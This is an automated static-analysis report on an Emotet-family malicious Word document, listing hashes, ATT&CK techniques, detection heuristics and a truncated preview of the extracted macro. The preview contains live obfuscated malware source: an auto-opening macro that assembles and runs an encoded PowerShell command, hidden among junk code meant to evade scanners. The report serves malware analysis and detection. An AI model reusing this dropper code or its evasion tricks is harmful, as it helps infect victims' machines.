Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7d3089cb9930a9d0…

MALICIOUS

Office (OLE)

Size: 205.1 KB
Created: 2019-03-13 06:48:00
Authoring application: Microsoft Office Word
First seen: 2021-09-25
MD5: bc69975d3727bffbc0f6e59488f70b05
SHA-1: 5b4837e75bc73cf9335c562945f40a8f5ba464c1
SHA-256: 7d3089cb9930a9d0c0fdb7d4e5909ee4a9b470476cc9b99e57bb1eefba7cf7b7
Risk score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6892858-0', strongly suggesting the Emotet family. Critical heuristics indicate obfuscated API calls, specifically reassembling 'Win32_Process', and an auto-executing VBA macro ('autoopen') that uses GetObject. This points to the macro's intent to download and execute a second-stage payload, a common Emotet behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6892858-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6892858-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39354 bytes
SHA-256: 688a31684aa41303b779ff84138a0daf40708c1fa877cab74a5227252e8ada5c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "TDZZAZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function XDoDxAAA()
   If kDABAAAB = jBAQZUUA Then
rAA1oAA1 = Chr(FDoB4AA)
Ok4UAAAA = H_Ax4ABA + ChrW(zQCABUQG) * 896450452 * CBool(945236921) + 771206311 / Round(zBowABAD) - RoA_A1G + Sqr(28125362) - 298852323 * CByte(204779173)
nAAoD4kD = Chr(uAAAUA)
End If
   If MC1wXwXA = UUA_ABA Then
sB4ZxAk = Chr(wACoCoA)
nBQGBo1 = UAXAAcU + ChrW(h_1BDAUB) * 528549579 * CBool(409327642) + 523721396 / Round(VGAZ44XA) - SwUAAQ + Sqr(530684608) - 976660593 * CByte(475811634)
UkwAQxCA = Chr(GCAUQDQU)
End If
   If OAxAAADA = iC_DDA Then
rAAGBk = Chr(QAA1AU)
XAAXG4A1 = fBQQ11 + ChrW(iZB4Zo) * 243619015 * CBool(35135114) + 433408346 / Round(JxCBQAXA) - LUoAAZk + Sqr(236703082) - 540283193 * CByte(758062734)
ExoABA = Chr(jXoB4XAc)
End If
   If ZC4_4A = nAUcww Then
zAXc_Ak = Chr(q4w1oAA)
BC_DZCG = LBABQcDo + ChrW(TBAABAAX) * 235363685 * CBool(761473209) + 870152621 / Round(FAXBAB) - QD_AXC + Sqr(952686863) - 832674850 * CByte(248485397)
PZZACA = Chr(lQAADU)
End If
   If jAUAAUD = p_AAA_A4 Then
HBZxAwA = Chr(HACDAG)
JXXQwABx = j1ADA_UA + ChrW(kAUAZA) * 362306479 * CBool(81105462) + 853252963 / Round(iBUAADB) - hxCwB4UQ + Sqr(275339162) - 483380093 * CByte(376794654)
GxQZxADU = Chr(VAx_Dw)
End If
   If rUBABAA = lcZGAA Then
vAwZcAAA = Chr(VoABA1)
sZGwDA = MAo4G4 + ChrW(RAAxBQAx) * 493001719 * CBool(827962784) + 337505268 / Round(tAwZA1) - kB44CG + Sqr(230390277) - 276417685 * CByte(734242857)
qkZBwkUD = Chr(lQ1AADZ)
End If
   If jUXDAAGw = sAAkkA Then
jZAwGB = Chr(bxAQGk)
vCAUBAwA = hA1ABDA + ChrW(aA_x4o) * 982795144 * CBool(715766393) + 631012098 / Round(ZUZDXXA) - Y1BBkAD + Sqr(764486410) - 720233305 * CByte(186433001)
JBAUAAQQ = Chr(ioxAAGw)
End If
End Function
Sub autoopen()
On Error Resume Next
   If mAc4QAG = CUcxwAA Then
Y_AU4cA = Chr(nADkADA)
kCAQ1AG = iABo_ABA + ChrW(B1ccABAB) * 465208336 * CBool(906153006) + 53399885 / Round(qAXDAA) - BAccAZoA + Sqr(916460620) - 552680124 * CByte(303970374)
SXAC4cUA = Chr(zABxA1DA)
End If
   If cZXQCDA = MU_BDGD Then
KAADxkUB = Chr(zADoBAD)
JABQDB = EAwQ_4DA + ChrW(J_DkD_Q) * 609826907 * CBool(213672493) + 889857253 / Round(VxAADCDX) - fAAZUA_ + Sqr(726031573) - 277655109 * CByte(156349624)
uQDAUD = Chr(hZAXAXDQ)
End If
z4A4A4 (TUUoAAB + "po" + HZ4GoDAG + "wersh" + LxwCBD + "ell -e " + KUCZkQA + JwAAX4Ao + CUUoCDA + oBAXGXUD + VXDAxBAB + i1Zc4U + RAZoAAGo)
   If dUACUA = O_AQ4AD Then
SAAQQoAQ = Chr(JBAA1DXB)
KGxAAkX = Z1GXCAoQ + ChrW(ZXUGcQQC) * 636579409 * CBool(501082295) + 421499176 / Round(YxUUw_) - l_BB_ZGD + Sqr(559236429) - 417494175 * CByte(571151515)
UUQxAA1A = Chr(cDXXXABA)
End If
   If f4cA4wC = DAAAA_o Then
h_cAUAAX = Chr(vQkA1X)
lk1AAD = SDAAGUD + ChrW(nZGoAZAB) * 741291263 * CBool(450037228) + 682880838 / Round(ACBAAB) - BAAAUCA + Sqr(117004240) - 546936833 * CByte(217677744)
aQUDAA = Chr(XGAA_DDX)
End If
   If zXADBUA = scZ1oQUZ Then
GUUAAAAB = Chr(RZUACD)
Q_UBcAA = V4BAAU + ChrW(pAAAxABD) * 279105647 * CBool(335301514) + 348879669 / Round(TQAoXc1) - oxDAAwD_ + Sqr(288360160) - 93303815 * CByte(472558799)
FAU1AA = Chr(iUQUADQo)
End If
End Sub
Function bDZADcGA()
   If AXA41C = RABQcBAA Then
mo__wAk = Chr(vABBcU1X)
bGC4o_wU = IAGAU4D + ChrW(wX_Xk1_) * 482984357 * CBool(616196272) + 599158772 / Round(TAACGQ1B) - Ck4ABGQA + Sqr(383196652) - 311111038 * CByte(532502944)
mA_B1Ac4 = Chr(nQACDUAQ)
End If
   If iADQADD = h1AQAU Then
fAQcAAw = Chr(wQGAAAAG)
jDU_QwkC = dDB1AwAZ + ChrW(NBQoA1) * 140008664 * CBool(117776798) + 903836519 / Round(r4GBAAU) - IGZ_XBwD + Sqr(749168483) - 492330873 * CByte(104531674)
tAAQAA = Chr(zAAAAQ)
End If
   If zCCBwx = bA1UXx Then
LC_ADQ = Chr(iUQU4AoA)
lCQAoXU = TUAoAA + ChrW(PAkUACAA) * 856484161 * CBool(238739587) + 61481460 / Round(SDBQAAAB) - Mw_4AQ + Sqr(484600863) - 741642980 * CByte(430500828)
ikAU1xAZ
... (truncated)